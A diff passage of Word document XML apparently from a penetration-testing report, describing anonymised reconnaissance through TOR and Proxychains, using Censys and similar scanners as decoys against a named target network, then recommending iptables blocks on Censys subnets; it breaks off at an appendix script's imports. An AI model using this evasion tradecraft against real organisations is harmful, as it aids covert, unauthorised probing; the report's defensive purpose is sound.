+        <w:t xml:space="preserve">important </w:t>
+      </w:r>
+      <w:r>
+        <w:t>information</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>To ensure a stealth presence is maintained</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">TOR should be used in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>w</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ith </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">automation </w:t>
+      </w:r>
+      <w:r>
+        <w:t>scripts</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> via Proxychains or direct integration into the script</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">This </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">would involve the call of Proxychains when </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">running </w:t>
+      </w:r>
+      <w:r>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ython</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> as follows.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7820932A" wp14:editId="1D7E2E61">
+            <wp:extent cx="5731510" cy="2362200"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="16" name="Picture 16" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="16" name="Picture 16" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2362200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: Python </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>&amp; Proxychains</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The automation script in appendix 1 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">is designed to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">merge the use of traceroute </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">and pings </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">in order to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">perform </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">automated </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">reconnaissance </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">with the purpose of identifying a target operating system. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Decoy scanning with Vulnerability Scanners</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">For means of information gathering via </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">“burner” machines we can conduct </w:t>
+      </w:r>
+      <w:r>
+        <w:t>vulnerability scanning</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">from </w:t>
+      </w:r>
+      <w:r>
+        <w:t>online bas</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ed </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">servers </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">hosted by vulnerability scanning </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">providers such as Shodan </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">(Paid service) or Censys and Natlas which are both free vulnerability scanners. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Even if the target </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">catches one of these </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">scanners, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">scan is not coming from our </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">original device, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">we are firstly </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">routing traffic through </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">an exit node via TOR; followed by </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">requesting a scan from a remotely hosted machine </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">which is responsible to conduct the scan and return results. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">This means that even if the alarm is raised from </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">using a vulnerability scanner, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">our original IP is not </w:t>
+      </w:r>
+      <w:r>
+        <w:t>blocked</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, although this </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">decreases the level of stealth. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">free solution </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">out of the list would </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">be Censys </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">which can </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">conduct detailed </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">active reconnaissance </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">from </w:t>
+      </w:r>
+      <w:r>
+        <w:t>a machine hosted by Censys</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> However</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Censys only allows 10 scans per day on free </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">usage in an attempt to prevent abuse of service. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">An example </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">scan on </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the target organisation has been conducted at:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>https://search.censys.io/search?resource=hosts&amp;q=%28autonomous_system.asn%3A786%29+and+location.country%3D%60United+Kingdom%60</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>From this information we’re able to</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> take previously learnt information such as the ASN and running a </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">scan against </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">all IP addresses within the ASN. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">We can then filter down the IP addresses we seek </w:t>
+      </w:r>
+      <w:r>
+        <w:t>from our target organisation.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">From </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a detection </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">perspective: Using Censys </w:t>
+      </w:r>
+      <w:r>
+        <w:t>does not lead back to your own machine</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> as Censys </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">has </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dedicated </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">subnets </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">from </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">which </w:t>
+      </w:r>
+      <w:r>
+        <w:t>scans are launc</w:t>
+      </w:r>
+      <w:r>
+        <w:t>hed,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> however </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">care should be taken to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">mask ones </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">identity </w:t>
+      </w:r>
+      <w:r>
+        <w:t>using TOR/VPN technology</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">We can confirm </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">IP addresses </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">being used for scanning target devices </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">are not leading back to our own </w:t>
+      </w:r>
+      <w:r>
+        <w:t>by analysing the out</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">put of the scan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>and checking the source</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> IP addresses provided as seen in figure. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04169C20" wp14:editId="5D52781D">
+            <wp:extent cx="3550920" cy="2900680"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="17" name="Picture 17" descr="Table&#10;&#10;Description automatically generated with medium confidence"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="17" name="Picture 17" descr="Table&#10;&#10;Description automatically generated with medium confidence"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId25"/>
+                    <a:srcRect r="38045" b="2038"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3550920" cy="2900680"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>There are a variety of vulnerability scanners which can be used on the internet such as:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Censys</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Zoomeye</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Shodan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Natlas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The advantage of using internet based scanners is we can use these machines as decoys to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">collect information from our target in the form of active reconnaissance. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A quick nslookup </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">on </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">this IP reveals </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the IP belonging to the Censys organisation, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">which </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">show that </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Censys </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">devices are treated </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">as decoy machines </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>when using t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">he Censys service allowing </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">our </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">own </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">devices </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">to be </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">protected </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">from being </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">discovered </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">during the active reconnaissance </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">phase. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>How can I protect my organisation?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Since port scanning was made possible with the support of Censys. IPTables configuration can prevent the following subnets from making any contact to the GitLab server to prevent port scans and gaining further information on the open ports:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>74.120.14.0/24</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>162.142.125.0/24</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>167.248.133.0/24</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>192.35.168.0/23</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This will prevent easy access port scanning from any device with an internet connection ranging from laptop, desktop to mobile phone regardless of having a Linux OS. More information can be found at: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId26" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          </w:rPr>
+          <w:t>https://support.censys.io/hc/en-us/articles/360038378552-Frequently-Asked-Questions</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>This change should be applied to all external perimeter machines to prevent an easy method of port scanning from internet based scanners like Censys.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Appendix</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Appendix 1: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>traceroute_to_o</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s.py</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#/usr/bin/python3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>import sys</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>import subprocess</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
